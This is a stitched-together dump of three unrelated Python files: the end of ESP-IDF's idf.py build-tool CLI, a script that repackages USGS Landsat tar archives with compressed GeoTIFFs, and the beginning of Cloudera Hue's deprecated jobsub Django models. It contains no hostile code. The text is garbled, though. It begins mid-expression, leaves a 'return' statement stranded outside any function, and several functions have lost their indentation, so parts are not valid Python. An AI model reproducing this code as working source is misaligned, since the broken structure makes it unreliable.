            + "2. Run CMake as necessary to configure the project and generate build files for the main build tool.\n\n"
            + "3. Run the main build tool (Ninja or GNU Make). By default, the build tool is automatically detected "
            + "but it can be explicitly set by passing the -G option to idf.py.\n\n",
            "options": global_options,
            "order_dependencies": [
                "reconfigure",
                "menuconfig",
                "clean",
                "fullclean",
            ],
        },
        "menuconfig": {
            "callback": build_target,
            "help": 'Run "menuconfig" project configuration tool.',
            "options": global_options,
        },
        "confserver": {
            "callback": build_target,
            "help": "Run JSON configuration server.",
            "options": global_options,
        },
        "size": {
            "callback": build_target,
            "help": "Print basic size information about the app.",
            "options": global_options,
            "dependencies": ["app"],
        },
        "size-components": {
            "callback": build_target,
            "help": "Print per-component size information.",
            "options": global_options,
            "dependencies": ["app"],
        },
        "size-files": {
            "callback": build_target,
            "help": "Print per-source-file size information.",
            "options": global_options,
            "dependencies": ["app"],
        },
        "bootloader": {
            "callback": build_target,
            "help": "Build only bootloader.",
            "options": global_options,
        },
        "app": {
            "callback": build_target,
            "help": "Build only the app.",
            "order_dependencies": ["clean", "fullclean", "reconfigure"],
            "options": global_options,
        },
        "efuse_common_table": {
            "callback": build_target,
            # Fixed user-facing help typo: "Genereate" -> "Generate".
            "help": "Generate C-source for IDF's eFuse fields.",
            "order_dependencies": ["reconfigure"],
            "options": global_options,
        },
        "efuse_custom_table": {
            "callback": build_target,
            # Fixed user-facing help typo: "Genereate" -> "Generate".
            "help": "Generate C-source for user's eFuse fields.",
            "order_dependencies": ["reconfigure"],
            "options": global_options,
        },
        "show_efuse_table": {
            "callback": build_target,
            "help": "Print eFuse table.",
            "order_dependencies": ["reconfigure"],
            "options": global_options,
        },
        "partition_table": {
            "callback": build_target,
            "help": "Build only partition table.",
            "order_dependencies": ["reconfigure"],
            "options": global_options,
        },
        "erase_otadata": {
            "callback": build_target,
            "help": "Erase otadata partition.",
            "options": global_options,
        },
        "read_otadata": {
            "callback": build_target,
            "help": "Read otadata partition.",
            "options": global_options,
        },
    }
}
# Reconfigure/clean actions.
clean_actions = {
    "actions": {
        "reconfigure": {
            "callback": reconfigure,
            "short_help": "Re-run CMake.",
            "help": "Re-run CMake even if it doesn't seem to need re-running. This isn't necessary during normal usage, "
            + "but can be useful after adding/removing files from the source tree, or when modifying CMake cache variables. "
            + "For example, \"idf.py -DNAME='VALUE' reconfigure\" "
            + 'can be used to set variable "NAME" in CMake cache to value "VALUE".',
            "options": global_options,
            "order_dependencies": ["menuconfig"],
        },
        "clean": {
            "callback": clean,
            "short_help": "Delete build output files from the build directory.",
            # Fixed help text: removed the stray space before the comma.
            "help": "Delete build output files from the build directory, forcing a 'full rebuild' the next time "
            + "the project is built. Cleaning doesn't delete CMake configuration output and some other files",
            "order_dependencies": ["fullclean"],
        },
        "fullclean": {
            "callback": fullclean,
            "short_help": "Delete the entire build directory contents.",
            # Fixed help text: the concatenated sentences were missing separating
            # spaces ("output.The next", "care.Project").
            "help": "Delete the entire build directory contents. This includes all CMake configuration output. "
            + "The next time the project is built, CMake will configure it from scratch. "
            + "Note that this option recursively deletes all files in the build directory, so use with care. "
            + "Project configuration is not deleted.",
        },
    }
}
# Serial options shared by the flash/monitor actions below.
baud_rate = {
    "names": ["-b", "--baud"],
    "help": "Baud rate.",
    "scope": "global",
    "envvar": "ESPBAUD",
    "default": 460800,
}

port = {
    "names": ["-p", "--port"],
    "help": "Serial port.",
    "scope": "global",
    "envvar": "ESPPORT",
    "default": None,
}
# Actions that talk to the device over a serial port.
serial_actions = {
    "actions": {
        "flash": {
            "callback": flash,
            "help": "Flash the project.",
            "options": global_options + [baud_rate, port],
            "dependencies": ["all"],
            "order_dependencies": ["erase_flash"],
        },
        "erase_flash": {
            "callback": erase_flash,
            "help": "Erase entire flash chip.",
            "options": [baud_rate, port],
        },
        "monitor": {
            "callback": monitor,
            "help": "Display serial output.",
            "options": [
                port,
                {
                    "names": ["--print-filter", "--print_filter"],
                    "help": (
                        "Filter monitor output.\n"
                        "Restrictions on what to print can be specified as a series of <tag>:<log_level> items "
                        "where <tag> is the tag string and <log_level> is a character from the set "
                        "{N, E, W, I, D, V, *} referring to a level. "
                        'For example, "tag1:W" matches and prints only the outputs written with '
                        'ESP_LOGW("tag1", ...) or at lower verbosity level, i.e. ESP_LOGE("tag1", ...). '
                        'Not specifying a <log_level> or using "*" defaults to Verbose level.\n'
                        'Please see the IDF Monitor section of the ESP-IDF documentation '
                        'for a more detailed description and further examples.'),
                    "default": None,
                },
            ],
            # Monitor runs after any requested flashing step.
            "order_dependencies": [
                "flash",
                "partition_table-flash",
                "bootloader-flash",
                "app-flash",
            ],
        },
        "partition_table-flash": {
            "callback": flash,
            "help": "Flash partition table only.",
            "options": [baud_rate, port],
            "dependencies": ["partition_table"],
            "order_dependencies": ["erase_flash"],
        },
        "bootloader-flash": {
            "callback": flash,
            "help": "Flash bootloader only.",
            "options": [baud_rate, port],
            "dependencies": ["bootloader"],
            "order_dependencies": ["erase_flash"],
        },
        "app-flash": {
            "callback": flash,
            "help": "Flash the app only.",
            "options": [baud_rate, port],
            "dependencies": ["app"],
            "order_dependencies": ["erase_flash"],
        },
        "encrypted-app-flash": {
            "callback": flash,
            "help": "Flash the encrypted app only.",
            "dependencies": ["app"],
            "order_dependencies": ["erase_flash"],
        },
        "encrypted-flash": {
            "callback": flash,
            "help": "Flash the encrypted project.",
            "dependencies": ["all"],
            "order_dependencies": ["erase_flash"],
        },
    },
}
base_actions = CLI.merge_action_lists(
    root_options, build_actions, clean_actions, serial_actions
)
all_actions = [base_actions]

# Load extensions
if os.path.exists(os.path.join(project_dir, "idf_ext.py")):
    sys.path.append(project_dir)
    try:
        from idf_ext import action_extensions
    except ImportError:
        print("Error importing extension file idf_ext.py. Skipping.")
        print(
            "Please make sure that it contains implementation (even if it's empty) of add_action_extensions"
        )

# Add actions extensions
try:
    all_actions.append(action_extensions(base_actions, project_dir))
except NameError:
    # No extension module was imported above; continue with base actions only.
    pass

return CLI(help="ESP-IDF build management", action_lists=all_actions)
def main():
    # Verify the environment before constructing and running the CLI.
    check_environment()
    cli = init_cli()
    cli(prog_name=PROG)
def _valid_unicode_config():
# Python 2 is always good
if sys.version_info[0] == 2:
return True
# With python 3 unicode environment is required
try:
return codecs.lookup(locale.getpreferredencoding()).name != "ascii"
except Exception:
return False
def _find_usable_locale():
    """Return the name of a UTF-8 locale available on this system.

    Preference order: C.UTF-8, then English UTF-8 locales (most recently listed
    first), then any other UTF-8 locale. Raises FatalError if none exist.
    """
    try:
        output = subprocess.Popen(
            ["locale", "-a"], stdout=subprocess.PIPE, stderr=subprocess.PIPE
        ).communicate()[0]
    except OSError:
        output = ""
    if isinstance(output, bytes):
        output = output.decode("ascii", "replace")

    usable_locales = []
    for line in output.splitlines():
        candidate = line.strip()
        normalized = candidate.lower().replace("-", "")
        if normalized == "c.utf8":
            # C.UTF-8 is the best option, if supported
            return candidate
        if normalized.endswith(".utf8"):
            # Make a preference of english locales
            if candidate.startswith("en_"):
                usable_locales.insert(0, candidate)
            else:
                usable_locales.append(candidate)

    if usable_locales:
        return usable_locales[0]

    raise FatalError(
        "Support for Unicode filenames is required, but no suitable UTF-8 locale was found on your system."
        " Please refer to the manual for your operating system for details on locale reconfiguration."
    )
if __name__ == "__main__":
    try:
        # On MSYS2 we need to run idf.py with "winpty" in order to be able to cancel the subprocesses properly on
        # keyboard interrupt (CTRL+C).
        # Using an own global variable for indicating that we are running with "winpty" seems to be the most suitable
        # option as os.environment['_'] contains "winpty" only when it is run manually from console.
        WINPTY_VAR = "WINPTY"
        WINPTY_EXE = "winpty"
        if ("MSYSTEM" in os.environ) and (
            not os.environ.get("_", "").endswith(WINPTY_EXE) and WINPTY_VAR not in os.environ
        ):
            os.environ[WINPTY_VAR] = "1"  # the value is of no interest to us
            # idf.py calls itself with "winpty" and WINPTY global variable set
            ret = subprocess.call(
                [WINPTY_EXE, sys.executable] + sys.argv, env=os.environ
            )
            if ret:
                raise SystemExit(ret)
        elif os.name == "posix" and not _valid_unicode_config():
            # Trying to find best utf-8 locale available on the system and restart python with it
            best_locale = _find_usable_locale()
            print(
                "Your environment is not configured to handle unicode filenames outside of ASCII range."
                " Environment variable LC_ALL is temporary set to %s for unicode support."
                % best_locale
            )
            os.environ["LC_ALL"] = best_locale
            # Re-run this script in a child process under the corrected locale.
            ret = subprocess.call([sys.executable] + sys.argv, env=os.environ)
            if ret:
                raise SystemExit(ret)
        else:
            main()
    except FatalError as e:
        # Exit code 2 for any expected idf.py error.
        print(e)
        sys.exit(2)
| |
#!/usr/bin/env python
"""
Repackage a USGS Collection-1 tar for faster read access.
They arrive as a *.tar.gz with inner uncompressed tiffs, which Josh's tests have found to be too slow to read.
We compress the inner tiffs and store them in an uncompressed tar. This allows random reads within the files.
We also append a checksum file at the end of the tar.
"""
import copy
import io
import socket
import stat
import sys
import tarfile
import tempfile
import traceback
from contextlib import suppress
from functools import partial
from itertools import chain
from pathlib import Path
from typing import List, Iterable, Tuple, Callable, IO, Dict
import click
import numpy
import rasterio
import structlog
from structlog.processors import (
StackInfoRenderer,
TimeStamper,
format_exc_info,
JSONRenderer,
)
from eodatasets3.ui import PathPath
from eodatasets3.verify import PackageChecksum
# GDAL GeoTIFF predictor per dtype: 2 = horizontal differencing (integers),
# 3 = floating-point predictor. Improves deflate compression of imagery.
_PREDICTOR_TABLE = {
    "int8": 2,
    "uint8": 2,
    "int16": 2,
    "uint16": 2,
    "int32": 2,
    "uint32": 2,
    "int64": 2,
    "uint64": 2,
    "float32": 3,
    "float64": 3,
}

# The info of a file, and a method to open the file for reading.
ReadableMember = Tuple[tarfile.TarInfo, Callable[[], IO]]

_LOG = structlog.get_logger()


class RecompressFailure(Exception):
    """Raised when recompressing an inner TIFF of a package fails."""

    pass
def _create_tarinfo(path: Path, name=None) -> tarfile.TarInfo:
"""
Create a TarInfo ("tar member") based on the given filesystem path.
(these contain the information of a file, such as permissions, when writing to a tar file)
This code is based on TarFile.gettarinfo(), but doesn't need an existing tar file.
"""
# We're avoiding convenience methods like `path.is_file()`, to minimise repeated `stat()` calls on lustre.
s = path.stat()
info = tarfile.TarInfo(name or path.name)
if stat.S_ISREG(s.st_mode):
info.size = s.st_size
info.type = tarfile.REGTYPE
elif stat.S_ISDIR(s.st_mode):
info.type = tarfile.DIRTYPE
info.size = 0
else:
raise NotImplementedError(
f"Only regular files and directories are supported for extracted datasets. "
f"({path.name} in {path.absolute().parent})"
)
info.mode = s.st_mode
info.uid = s.st_uid
info.gid = s.st_gid
info.mtime = s.st_mtime
if tarfile.pwd:
try:
info.uname = tarfile.pwd.getpwuid(info.uid)[0]
except KeyError:
pass
if tarfile.grp:
try:
info.gname = tarfile.grp.getgrgid(info.gid)[0]
except KeyError:
pass
return info
def _tar_members(in_tar: tarfile.TarFile) -> Iterable[ReadableMember]:
"""Get readable files (members) from a tar"""
members: List[tarfile.TarInfo] = in_tar.getmembers()
for member in members:
# We return a lambda/callable so that the file isn't opened until it's needed.
yield member, partial(in_tar.extractfile, member)
def _folder_members(path: Path, base_path: Path = None) -> Iterable[ReadableMember]:
"""
Get readable files (presented as tar members) from a directory.
"""
if not base_path:
base_path = path
# Note that the members in input USGS tars are sorted alphabetically.
# We'll sort our own inputs to match.
# (The primary practical benefit is predictable outputs in tests)
for item in sorted(path.iterdir()):
member = _create_tarinfo(item, name=str(item.relative_to(base_path)))
if member.type == tarfile.DIRTYPE:
yield member, None
yield from _folder_members(item, base_path=path)
else:
# We return a lambda/callable so that the file isn't opened until it's needed.
yield member, partial(item.open, "rb")
def repackage_tar(
    input_path: Path,
    input_files: Iterable[ReadableMember],
    output_tar_path: Path,
    clean_inputs: bool,
    **compress_args,
) -> bool:
    """Repackage the given input members into an uncompressed tar at output_tar_path.

    Returns True on success (or when the output already exists); logs the error
    and returns False on any failure. When clean_inputs is set, the inputs are
    deleted after a successful repackage.
    """
    log = _LOG.bind(
        name=output_tar_path.stem,
        in_path=str(input_path.absolute()),
        out_path=str(output_tar_path.absolute()),
    )

    if output_tar_path.exists():
        # Already repackaged previously: treat as success, do nothing.
        log.info("skip.exists")
        return True

    try:
        members = list(input_files)

        # Add the MTL file to the beginning of the output tar, so it can be accessed faster.
        # This slows down this repackage a little, as we're seeking/decompressing the input stream an extra time.
        _reorder_tar_members(members, input_path.name)

        _create_tar_with_files(input_path, members, output_tar_path, **compress_args)

        log.info(
            "complete",
            in_size=sum(m.size for m, _ in members),
            in_count=len(members),
            # The user/group give us a hint as to whether this was repackaged outside of USGS.
            in_users=list({(member.uname, member.gname) for member, _ in members}),
            out_size=output_tar_path.stat().st_size,
        )

        result_exists = output_tar_path.exists()
        if not result_exists:
            # This should never happen, so it's an exception.
            raise RuntimeError(f"No output after a success? Expected {output_tar_path}")

        if clean_inputs:
            # Delete the originals, but never the output we just wrote.
            log.info("input.cleanup")
            please_remove(input_path, excluding=output_tar_path)
    except Exception:
        log.exception("error", exc_info=True)
        return False
    return True
def _create_tar_with_files(
    input_path: Path,
    members: List[ReadableMember],
    output_tar_path: Path,
    **compress_args,
) -> None:
    """
    Package and compress the given input files to a new tar path.

    The output tar path is written atomically, so on failure it will only exist if complete.
    """
    out_dir: Path = output_tar_path.parent
    out_dir.mkdir(parents=True, exist_ok=True)

    # Accumulates checksums of everything written; appended as package.sha1.
    verify = PackageChecksum()

    # Use a temporary file so that we can move to the output path atomically.
    with tempfile.TemporaryDirectory(prefix=".extract-", dir=str(out_dir)) as tmpdir:
        tmpdir = Path(tmpdir).absolute()
        tmp_out_tar = tmpdir.joinpath(output_tar_path.name)

        # Note: mode "w" — the outer tar is deliberately uncompressed so that
        # the (individually deflated) inner files can be random-accessed.
        with tarfile.open(tmp_out_tar, "w") as out_tar:
            with click.progressbar(
                label=input_path.name,
                length=sum(member.size for member, _ in members),
                file=sys.stderr,
            ) as progress:
                file_number = 0
                for readable_member in members:
                    file_number += 1
                    progress.label = (
                        f"{input_path.name} ({file_number:2d}/{len(members)})"
                    )
                    _recompress_tar_member(
                        readable_member, out_tar, compress_args, verify, tmpdir
                    )
                    member, _ = readable_member
                    progress.update(member.size)

            # Append sha1 checksum file
            checksum_path = tmpdir / "package.sha1"
            verify.write(checksum_path)
            checksum_path.chmod(0o664)
            out_tar.add(checksum_path, checksum_path.name)

        # Match the lower r/w permission bits to the output folder.
        # (Temp directories default to 700 otherwise.)
        tmp_out_tar.chmod(out_dir.stat().st_mode & 0o777)
        # Our output tar is complete. Move it into place.
        tmp_out_tar.rename(output_tar_path)
def _recompress_tar_member(
    readable_member: ReadableMember,
    out_tar: tarfile.TarFile,
    compress_args: Dict,
    verify: PackageChecksum,
    tmpdir: Path,
):
    """Write one input member into out_tar, deflate-compressing uncompressed TIFFs.

    Non-TIFF members (and already-compressed TIFFs) are copied verbatim.
    Every written file is also added to the running checksum *verify*.
    """
    member, open_member = readable_member

    new_member = copy.copy(member)
    # Copy with a minimum 664 permission, which is used by USGS tars.
    # (some of our repacked datasets have only user read permission.)
    new_member.mode = new_member.mode | 0o664

    # If it's a tif, check whether it's compressed.
    if member.name.lower().endswith(".tif"):
        with open_member() as input_fp, rasterio.open(input_fp) as ds:
            if not ds.profile.get("compress"):
                # No compression: let's compress it
                with rasterio.MemoryFile(filename=member.name) as memory_file:
                    try:
                        _recompress_image(ds, memory_file, **compress_args)
                    except Exception as e:
                        raise RecompressFailure(f"Error during {member.name}") from e
                    new_member.size = memory_file.getbuffer().nbytes
                    out_tar.addfile(new_member, memory_file)

                    # Image has been written. Seek to beginning to take a checksum.
                    memory_file.seek(0)
                    verify.add(memory_file, tmpdir / new_member.name)
                    return
            else:
                # It's already compressed, we'll fall through and copy it verbatim.
                pass

    if member.size == 0:
        # Typically a directory entry.
        out_tar.addfile(new_member)
        return

    # Copy unchanged into target (typically text/metadata files).
    # NOTE(review): `member` is deliberately rebound here from the TarInfo to
    # the opened file object; the TarInfo is no longer needed below.
    with open_member() as member:
        file_contents = member.read()
    out_tar.addfile(new_member, io.BytesIO(file_contents))
    verify.add(io.BytesIO(file_contents), tmpdir / new_member.name)
    del file_contents
def _reorder_tar_members(members: List[ReadableMember], identifier: str):
"""
Put the (tiny) MTL file at the beginning of the tar so that it's always quick to read.
"""
# Find MTL
for i, (member, _) in enumerate(members):
if "_MTL" in member.path:
mtl_index = i
break
else:
formatted_members = "\n\t".join(m.name for m, _ in members)
raise ValueError(
f"No MTL file found in package {identifier}. Have:\n\t{formatted_members}"
)
# Move to front
mtl_item = members.pop(mtl_index)
members.insert(0, mtl_item)
def _recompress_image(
    input_image: rasterio.DatasetReader,
    output_fp: rasterio.MemoryFile,
    zlevel=9,
    block_size=(512, 512),
):
    """
    Read an image from given file pointer, and write as a compressed GeoTIFF.

    Writes a tiled, deflate-compressed GTiff with a dtype-appropriate predictor
    (see _PREDICTOR_TABLE). Band metadata/tags are copied across.
    """
    # noinspection PyUnusedLocal

    block_size_y, block_size_x = block_size

    if len(input_image.indexes) != 1:
        raise ValueError(
            f"Expecting one-band-per-tif input (USGS packages). "
            f"Input has multiple layers {repr(input_image.indexes)}"
        )

    array: numpy.ndarray = input_image.read(1)

    profile = input_image.profile
    profile.update(
        driver="GTiff",
        predictor=_PREDICTOR_TABLE[array.dtype.name],
        compress="deflate",
        zlevel=zlevel,
        blockxsize=block_size_x,
        blockysize=block_size_y,
        tiled=True,
    )

    with output_fp.open(**profile) as output_dataset:
        output_dataset.write(array, 1)
        # Copy gdal metadata
        output_dataset.update_tags(**input_image.tags())
        output_dataset.update_tags(1, **input_image.tags(1))
@click.command(help=__doc__)
@click.option(
    "--output-base",
    type=PathPath(file_okay=False, writable=True),
    help="The base output directory "
    "(default to same dir as input if --clean-inputs).",
)
@click.option(
    "--zlevel", type=click.IntRange(0, 9), default=5, help="Deflate compression level."
)
@click.option(
    "--block-size", type=int, default=512, help="Compression block size (both x and y)"
)
@click.option(
    "--clean-inputs/--no-clean-inputs",
    default=False,
    help="Delete originals after repackaging",
)
@click.option("-f", "input_file", help="Read paths from file", type=click.File("r"))
@click.argument("paths", nargs=-1, type=PathPath(exists=True, readable=True))
def main(
    paths: List[Path],
    input_file,
    output_base: Path,
    zlevel: int,
    clean_inputs: bool,
    block_size: int,
):
    # Structured (json) logging goes to stdout
    structlog.configure(
        processors=[
            StackInfoRenderer(),
            format_exc_info,
            TimeStamper(utc=False, fmt="iso"),
            JSONRenderer(),
        ]
    )

    if (not output_base) and (not clean_inputs):
        raise click.UsageError(
            "Need to specify either a different output directory (--output-base) "
            "or to clean inputs (--clean-inputs)"
        )

    if input_file:
        # Lazily read paths from the given file ahead of any positional paths.
        paths = chain((Path(p.strip()) for p in input_file), paths)

    with rasterio.Env():
        total = failures = 0
        for path in paths:
            total += 1
            # Input is either a tar.gz file, or a directory containing an MTL (already extracted)
            if path.suffix.lower() == ".gz":
                with tarfile.open(str(path), "r") as in_tar:
                    success = repackage_tar(
                        path,
                        _tar_members(in_tar),
                        _output_tar_path(output_base, path),
                        clean_inputs=clean_inputs,
                        zlevel=zlevel,
                        block_size=(block_size, block_size),
                    )
            elif path.is_dir():
                success = repackage_tar(
                    path,
                    _folder_members(path),
                    _output_tar_path_from_directory(output_base, path),
                    clean_inputs=clean_inputs,
                    zlevel=zlevel,
                    block_size=(block_size, block_size),
                )
            else:
                raise ValueError(
                    f"Expected either tar.gz or a dataset folder. " f"Got: {repr(path)}"
                )

            if not success:
                failures += 1

    if total > 1:
        _LOG.info(
            "node.finish",
            host=socket.getfqdn(),
            total_count=total,
            failure_count=failures,
        )

    # The exit code is the number of failed datasets (0 == everything succeeded).
    sys.exit(failures)
def please_remove(path: Path, excluding: Path):
    """
    Recursively delete ``path`` and everything beneath it, sparing ``excluding``.

    Directories that still contain the spared file (or anything else that
    cannot be removed) are left in place.
    """
    # The spared path itself (file or directory) is never touched.
    if path.absolute() == excluding.absolute():
        return

    if not path.is_dir():
        path.unlink()
        return

    for child in path.iterdir():
        please_remove(child, excluding)
    # The directory may be non-empty (it held the spared file): ignore that.
    with suppress(OSError):
        path.rmdir()
def _format_exception(e: BaseException):
"""
Shamelessly stolen from stdlib's logging module.
"""
with io.StringIO() as sio:
traceback.print_exception(e.__class__, e, e.__traceback__, None, sio)
return sio.getvalue().strip()
def _output_tar_path(base_output, input_path):
if base_output:
out_path = _calculate_out_base_path(base_output, input_path)
else:
out_path = input_path
# Remove .gz suffix
name = out_path.stem
if not name.endswith(".tar"):
raise RuntimeError(f"Expected path to end in .tar.gz, got: {out_path}")
return out_path.with_name(name)
def _output_tar_path_from_directory(base_output, input_path):
mtl_files = list(input_path.glob("*_MTL.txt"))
if not mtl_files:
raise ValueError(f"Dataset has no mtl: {input_path}")
if len(mtl_files) > 1:
_LOG.warn("multiple.mtl.files", in_path=input_path)
mtl_file = mtl_files[0]
dataset_name = mtl_file.name.replace("_MTL.txt", "")
if base_output:
return _calculate_out_base_path(base_output, input_path) / f"{dataset_name}.tar"
else:
return input_path / f"{dataset_name}.tar"
def _calculate_out_base_path(out_base: Path, path: Path) -> Path:
if "USGS" not in path.parts:
raise ValueError(
"Expected AODH input path structure, "
"eg: /AODH/USGS/L1/Landsat/C1/092_091/LT50920911991126/LT05_L1GS_092091_19910506_20170126_01_T2.tar.gz"
)
# The directory structure after the "USGS" folder is recreated onto the output base folder.
return out_base.joinpath(*path.parts[path.parts.index("USGS") + 1 : -1], path.name)
# Allow running this module directly as a command-line tool
# (click parses the arguments declared on `main`).
if __name__ == "__main__":
    main()
| |
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from django.db import models
from django.core import urlresolvers
from django.contrib.auth.models import User
from desktop.lib.parameterization import find_parameters, bind_parameters
from django.utils.translation import ugettext_lazy as _
LOG = logging.getLogger(__name__)
class JobDesign(models.Model):
  """
  DEPRECATED!!!

  This is the old Hue 1.x job design model. In Hue 2, the design is modeled
  after Oozie workflows.

  Contains CMS information for "job designs".
  """
  owner = models.ForeignKey(User)
  name = models.CharField(max_length=40)
  description = models.CharField(max_length=1024)
  last_modified = models.DateTimeField(auto_now=True)
  # Type corresponds to a JobSubForm that gets registered in jobsub.forms.interface.registry
  type = models.CharField(max_length=128)
  # Data is serialized via JobSubFormInterface.serialize_[to|from]_string
  data = models.TextField()

  def edit_url(self):
    """URL of the page for editing this design."""
    return urlresolvers.reverse("jobsub.views.edit_design", kwargs=dict(id=self.id))

  def clone_url(self):
    """URL that clones this design when visited."""
    return urlresolvers.reverse("jobsub.views.clone_design", kwargs=dict(id=self.id))

  def delete_url(self):
    """URL that deletes this design when visited."""
    return urlresolvers.reverse("jobsub.views.delete_design", kwargs=dict(id=self.id))

  def submit_url(self):
    """URL of the page for submitting this design."""
    return urlresolvers.reverse("jobsub.views.submit_design", kwargs=dict(id=self.id))

  def clone(self):
    """Return a newly saved copy of this design (same fields, fresh id)."""
    # Copy every field except the primary key; create() assigns a new one.
    clone_kwargs = dict((field.name, getattr(self, field.name))
                        for field in self._meta.fields if field.name != 'id')
    return self.__class__.objects.create(**clone_kwargs)

  def to_jsonable(self):
    """Return a JSON-serializable summary of this design."""
    return {
      'owner': self.owner.username,
      'name': self.name,
      'last_modified': str(self.last_modified),
      'type': self.type,
      'data': repr(self.data)
    }
class CheckForSetup(models.Model):
  """
  A model which should have at most one row, indicating
  whether jobsub_setup has run successfully.
  """
  # Pre-Hue2 setup
  setup_run = models.BooleanField()
  # What kind of setup have we done?
  setup_level = models.IntegerField(default=0)
################################## New Models ################################

# Maximum length of the HDFS-path CharFields on the models below.
PATH_MAX = 512
class OozieAction(models.Model):
  """
  DEPRECATED!!!

  This is the old Hue 2.0/2.1 job design model. In Hue 2.2 and newer,
  Oozie models are used.

  The OozieAction model is an abstract base class. All concrete actions
  derive from it. And it provides something for the OozieDesign to
  reference. See
  https://docs.djangoproject.com/en/dev/topics/db/models/#multi-table-inheritance
  """
  # Subclasses override this with the tuple of field names that may
  # contain ${...} parameters.
  PARAM_FIELDS = ( ) # Nothing is parameterized by default

  # This allows the code to easily figure out which subclass to access
  action_type = models.CharField(max_length=64, blank=False)

  def find_parameters(self):
    """Return a list of parameters in the various fields"""
    return find_parameters(self, self.PARAM_FIELDS)

  def bind_parameters(self, mapping):
    """
    Change the values of the model object by replacing the param variables
    with actual values.

    Mapping is a dictionary of variable to value.
    """
    # We're going to alter this object. Disallow saving (for models).
    # Shadowing the bound save() method with None makes any later
    # self.save() call fail loudly instead of persisting bound values.
    self.save = None
    bind_parameters(self, mapping, self.PARAM_FIELDS)
class OozieDesign(models.Model):
  """
  DEPRECATED!!!

  This is the old Hue 2.0/2.1 job design model. In Hue 2.2 and newer,
  Oozie models are used.

  Contains information about all (Oozie) designs. Specific action info are
  stored in the Oozie*Action models.
  """
  # Generic stuff
  owner = models.ForeignKey(User)
  name = models.CharField(max_length=64, blank=False,
                          help_text=_('Name of the design, which must be unique per user.'))
  description = models.CharField(max_length=1024, blank=True)
  last_modified = models.DateTimeField(auto_now=True)

  # Action. Avoid using `root_action' directly, because it only gives you the
  # intermediate table (i.e. OozieAction). You want to use `get_root_action()'
  # most of the time.
  root_action = models.ForeignKey(OozieAction)

  def get_root_action(self):
    """Return the concrete action object, not just a generic OozieAction"""
    root = self.root_action
    if root is None:
      return None
    # Multi-table inheritance: the subclass row is reached through the
    # implicit one-to-one attribute named after the subclass.
    if root.action_type == OozieMapreduceAction.ACTION_TYPE:
      return root.ooziemapreduceaction
    elif root.action_type == OozieStreamingAction.ACTION_TYPE:
      return root.ooziestreamingaction
    elif root.action_type == OozieJavaAction.ACTION_TYPE:
      return root.ooziejavaaction
    # Unknown action_type: log and return None rather than raise.
    LOG.error("Oozie action type '%s' is not valid (jobsub_oozieaction.id %s)"
              % (root.action_type, root.id))
    return None

  def clone(self, new_owner=None):
    """Return a newly saved instance."""
    action_copy = self.get_root_action()
    action_copy.pk = None # Need a new OozieAction (superclass instance)
    action_copy.id = None # Need a new action instance as well
    action_copy.save()

    # Django clone idiom: clearing the pk and saving INSERTs a new row.
    # Note `copy` is this same in-memory object, rebound to the fresh pk.
    copy = self
    copy.pk = None
    copy.root_action = action_copy
    if new_owner is not None:
      copy.owner = new_owner
    copy.save()
    return copy

  def find_parameters(self):
    # Parameter discovery is delegated to the concrete action.
    return self.get_root_action().find_parameters()

  def bind_parameters(self, mapping):
    # Parameter binding is delegated to the concrete action.
    return self.get_root_action().bind_parameters(mapping)
class OozieMapreduceAction(OozieAction):
  """
  DEPRECATED!!!

  This is the old Hue 2.0/2.1 job design model. In Hue 2.2 and newer,
  Oozie models are used.

  Stores MR actions
  """
  # Fields that may contain ${...} parameters (see OozieAction).
  PARAM_FIELDS = ('files', 'archives', 'job_properties', 'jar_path')
  ACTION_TYPE = "mapreduce"

  # For the distributed cache. JSON arrays.
  files = models.CharField(max_length=PATH_MAX, default="[]",
                           help_text=_('List of paths to files to be added to the distributed cache.'))
  archives = models.CharField(max_length=PATH_MAX, default="[]",
                              help_text=_('List of paths to archives to be added to the distributed cache.'))

  # For the job configuration. JSON dict. Required (e.g. mapred.mapper.class).
  job_properties = models.TextField(default="[]")

  # Location of the jar in hdfs
  jar_path = models.CharField(max_length=PATH_MAX,
                              help_text=_('Path to jar files on HDFS.'))
class OozieStreamingAction(OozieAction):
  """
  DEPRECATED!!!

  This is the old Hue 2.0/2.1 job design model. In Hue 2.2 and newer,
  Oozie models are used.

  This is still an MR action from Oozie's perspective. But the data modeling is
  slightly different.

  Note that we don't inherit from OozieMapreduceAction because we want the data
  to be in one place.
  """
  # Fields that may contain ${...} parameters (see OozieAction).
  PARAM_FIELDS = ('files', 'archives', 'job_properties', 'mapper', 'reducer')
  ACTION_TYPE = "streaming"

  # For the distributed cache. JSON arrays.
  files = models.CharField(max_length=PATH_MAX, default="[]")
  archives = models.CharField(max_length=PATH_MAX, default="[]")

  # For the job configuration. JSON dict. Required (e.g. mapred.input.dir).
  job_properties = models.TextField(default="[]")

  # Scripts/commands (paths in hdfs)
  mapper = models.CharField(max_length=PATH_MAX, blank=False)
  reducer = models.CharField(max_length=PATH_MAX, blank=False)
class OozieJavaAction(OozieAction):
  """
  DEPRECATED!!!

  This is the old Hue 2.0/2.1 job design model. In Hue 2.2 and newer,
  Oozie models are used.

  Definition of Java actions
  """
  # Fields that may contain ${...} parameters (see OozieAction).
  PARAM_FIELDS = ('files', 'archives', 'jar_path', 'main_class', 'args',
                  'java_opts', 'job_properties')
  ACTION_TYPE = "java"

  # For the distributed cache. JSON arrays.
  files = models.CharField(max_length=PATH_MAX, default="[]",
                           help_text=_('List of paths to files to be added to the distributed cache.'))
  archives = models.CharField(max_length=PATH_MAX, default="[]",
                              help_text=_('List of paths to archives to be added to the distributed cache.'))

  # Location of the jar in hdfs
  jar_path = models.CharField(max_length=PATH_MAX, blank=False)
  # Java entry point and its command-line/JVM arguments.
  main_class = models.CharField(max_length=256, blank=False)
  args = models.TextField(blank=True)
  java_opts = models.CharField(max_length=256, blank=True)

  # For the job configuration. JSON dict.
  job_properties = models.TextField(default="[]")
class JobHistory(models.Model):
  """
  DEPRECATED!!!

  This is the old Hue 2.0/2.1 job design model. In Hue 2.2 and newer,
  Oozie models are used.

  Contains information on submitted jobs/workflows.
  """
  owner = models.ForeignKey(User)
